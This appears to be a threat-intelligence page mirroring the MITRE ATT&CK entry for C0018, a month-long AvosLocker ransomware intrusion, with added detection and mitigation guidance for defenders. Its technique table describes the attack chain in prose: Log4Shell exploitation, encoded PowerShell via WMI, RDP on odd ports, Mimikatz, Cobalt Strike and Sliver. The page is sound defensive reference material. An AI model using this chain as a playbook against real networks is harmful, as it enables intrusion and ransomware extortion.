C0018: C0018
C0018 was a month-long ransomware intrusion that successfully deployed AvosLocker onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing AvosLocker.[1][2]
Analyst context for executives and security teams
C0018 matters because it shows a ransomware intrusion pattern that moved from an exposed server to internal discovery, credential access tooling, remote access/C2 frameworks, lateral movement, and eventual AvosLocker deployment. For leaders, the decision value is not the campaign name itself; it is whether exposed services, administrative tooling, remote desktop paths, credential controls, and ransomware impact readiness are governed and evidenced well enough to stop or contain a similar month-long intrusion before encryption.
Executive priority
Prioritize this as a ransomware resilience and exposed-attack-surface validation case. Executives should ask whether public-facing systems are continuously inventoried and remediated, whether privileged credential exposure is monitored, whether RDP/WMI/software deployment tools are controlled, and whether incident response can prove lateral movement and tool staging activity quickly. Because ATT&CK provides no official detection text for this campaign, coverage should be demonstrated through local telemetry, control testing, and incident playbooks rather than assumed from ATT&CK alone.
Technical view
SOC, detection engineering, and IR teams should validate coverage across the relationship chain supplied by ATT&CK: initial access via Exploit Public-Facing Application, discovery such as network configuration, user, and service discovery, execution through PowerShell, WMI, rundll32, and software deployment tools, C2/tooling involving Cobalt Strike, Sliver, web protocols, non-standard ports, remote desktop software, and file transfer, credential risk through Mimikatz, lateral activity via RDP and lateral tool transfer, and impact through data encryption. Focus on correlations that connect exposed-server compromise to internal administration abuse and ransomware staging, not isolated tool-name alerts only.
Likely telemetry
- Internet-facing server inventory, vulnerability, and application logs for exposed services
- Endpoint process creation and command-line telemetry, including PowerShell, WMI, rundll32, netsh, ping, and renamed or masqueraded binaries
- Authentication and session logs for RDP and other remote access activity
- Windows security, PowerShell, and WMI operational logs where applicable
- EDR detections and file events for tool transfer, staging directories, suspicious DLL execution, and ransomware-related file activity
Detection direction
- Build detection around behavior clusters: exposed-server access followed by discovery commands, tool ingress, credential dumping indicators, remote execution, lateral transfer, and encryption activity.
- Tune carefully for dual-use tools. Ping, netsh, PowerShell, WMI, rundll32, RDP, remote desktop software, and software deployment systems are common in administration; prioritize unusual parent-child process chains, rare hosts, new administrative paths, abnormal timing, and newly observed binaries.
- Validate visibility for Cobalt Strike and Sliver-like C2 using network behavior, process lineage, and file staging evidence, not only static signatures.
- Look for command obfuscation and masquerading by comparing command patterns, binary paths, names, hashes, signer information, and execution locations against enterprise baselines.
- Confirm that ransomware-impact detections include early indicators such as tool staging and lateral movement, not only final encryption events.
Mitigation priorities
- Reduce initial access risk by maintaining an accurate inventory of Internet-facing applications and remediating exposed server vulnerabilities or misconfigurations based on risk.
- Restrict and monitor administrative pathways such as RDP, WMI, software deployment tooling, and remote desktop software; require strong authentication and limit privileged access where applicable.
- Harden credential protections and monitor for credential dumping behavior associated with tools such as Mimikatz.
- Control script and command execution through least privilege, logging, and policy enforcement for PowerShell, rundll32, and administrative utilities.
- Segment critical systems and limit lateral file transfer paths to reduce ransomware propagation opportunities.
Analyst notes and limits
This object is a campaign entry, not a full procedure report. ATT&CK states the intrusion lasted about a month, began through an exposed server, used open-source tools, and deployed AvosLocker. The relationship set is valuable because it maps the defensive validation surface: public-facing exploitation, discovery, credential dumping, remote execution, C2, lateral movement, and data encryption. Local environment baselines are essential because many related tools and techniques overlap heavily with legitimate administration.
Official detection is not provided, the campaign platforms are not specified, and the actors are unidentified in the supplied description. Related software and technique platform fields indicate where those objects may apply, but they should not be treated as confirmed campaign platform scope without local evidence. This take does not assert active exploitation, attribution, customer exposure, or guaranteed detection coverage.
C0018
C0018 was a month-long ransomware intrusion that successfully deployed AvosLocker onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing AvosLocker.[1][2]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1190 | Exploit Public-Facing Application | During C0018, the threat actors exploited VMWare Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.CitationCisco Talos Avos Jun 2022 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | |
| Enterprise | T1571 | Non-Standard Port | During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.CitationCosta AvosLocker May 2022 |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.CitationCosta AvosLocker May 2022 |
| Enterprise | T1219.002 | Remote Desktop Software Sub-technique | During C0018, the threat actors used AnyDesk to transfer tools between systems.CitationCisco Talos Avos Jun 2022CitationCosta AvosLocker May 2022 |
| Enterprise | T1570 | Lateral Tool Transfer | During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.CitationCisco Talos Avos Jun 2022CitationCosta AvosLocker May 2022 |
| Enterprise | T1033 | System Owner/User Discovery | During C0018, the threat actors collected `whoami` information via PowerShell scripts.CitationCosta AvosLocker May 2022 |
| Enterprise | T1486 | Data Encrypted for Impact | During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network.CitationCisco Talos Avos Jun 2022CitationCosta AvosLocker May 2022 |
| Enterprise | T1046 | Network Service Discovery | During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning.CitationCisco Talos Avos Jun 2022 |
| Enterprise | T1059.001 | PowerShell Sub-technique | During C0018, the threat actors used encoded PowerShell scripts for execution.CitationCisco Talos Avos Jun 2022CitationCosta AvosLocker May 2022 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | During C0018, the threat actors used Base64 to encode their PowerShell scripts.CitationCisco Talos Avos Jun 2022CitationCosta AvosLocker May 2022 |
| Enterprise | T1016 | System Network Configuration Discovery | During C0018, the threat actors ran `nslookup` and Advanced IP Scanner on the target network.CitationCosta AvosLocker May 2022 |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1071.001 | Web Protocols Sub-technique | During C0018, the threat actors used HTTP for C2 communications.CitationCosta AvosLocker May 2022 |
| Enterprise | T1072 | Software Deployment Tools | During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network.CitationCisco Talos Avos Jun 2022 |
| Enterprise | T1105 | Ingress Tool Transfer | During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network.CitationCisco Talos Avos Jun 2022CitationCosta AvosLocker May 2022 |
| Enterprise | T1036 | Masquerading | During C0018, AvosLocker was disguised using the victim company name as the filename.CitationCisco Talos Avos Jun 2022 |
| Enterprise | T1047 | Windows Management Instrumentation | During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (`wmiprvse.exe`) to execute a variety of encoded PowerShell scripts using the `DownloadString` method.CitationCisco Talos Avos Jun 2022CitationCosta AvosLocker May 2022 |
| Enterprise | T1218.011 | Rundll32 Sub-technique |
Groups, software, and campaigns
S0633: Sliver
S0108: netsh
S0097: Ping
S1053: AvosLocker
AvosLocker is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, AvosLocker had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.[1][2][3]
S0002: Mimikatz
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | b8aa3fa0dcc0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Costa AvosLocker May 2022
Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.
Open source URL -
[2]
Cisco Talos Avos Jun 2022
Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.
Open source URL -
[3]
mitre-attack C0018Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.